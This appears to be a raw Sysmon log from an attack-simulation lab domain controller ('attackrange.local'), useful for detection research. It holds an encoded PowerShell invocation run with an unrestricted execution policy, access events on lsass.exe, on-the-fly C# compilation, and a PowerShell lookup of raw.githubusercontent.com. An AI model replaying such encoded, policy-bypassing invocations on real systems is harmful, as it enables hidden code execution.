A1-8346-070000000000}0x746830HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CB0-5FA1-B900-000000008801}4348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x80000000000000003768Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.094{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003767Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.094{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003766Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.094{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003765Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:17.094{D28789B6-7CB0-5FA1-BB00-000000008801}1592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\rsgf2fl5.dll2020-11-03 15:52:16.985 10341000x80000000000000003764Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.079{D28789B6-7CB0-5FA1-B600-000000008801}12524136C:\Windows\system32\conhost.exe{D28789B6-7CB1-5FA1-BC00-000000008801}3228C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003763Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.079{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003762Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.079{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003761Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.079{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003760Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.079{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003759Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.079{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003758Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.079{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003757Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.079{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003756Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.079{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003755Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.079{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003754Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.079{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CB1-5FA1-BC00-000000008801}3228C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003753Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.079{D28789B6-7CB0-5FA1-BB00-000000008801}15923160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{D28789B6-7CB1-5FA1-BC00-000000008801}3228C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003752Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.086{D28789B6-7CB1-5FA1-BC00-000000008801}3228C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES4745.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSCADEA8ED256D44637843F76953E54CE9E.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CB0-5FA1-8346-070000000000}0x746830HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{D28789B6-7CB0-5FA1-BB00-000000008801}1592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\rsgf2fl5.cmdline" 22542200x80000000000000003838Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:17.553{D28789B6-7CB1-5FA1-BD00-000000008801}4512raw.githubusercontent.com0type: 5 github.map.fastly.net;::ffff:151.101.112.133;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 11241100x80000000000000003837Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:19.647{D28789B6-7CB3-5FA1-BE00-000000008801}2748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\344h0a0w\344h0a0w.dll2020-11-03 15:52:19.553 10341000x80000000000000003836Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.631{D28789B6-7CB0-5FA1-B600-000000008801}12524136C:\Windows\system32\conhost.exe{D28789B6-7CB3-5FA1-BF00-000000008801}4316C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003835Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.631{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003834Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.631{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003833Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.631{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003832Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.631{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003831Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:19.631{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003830Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 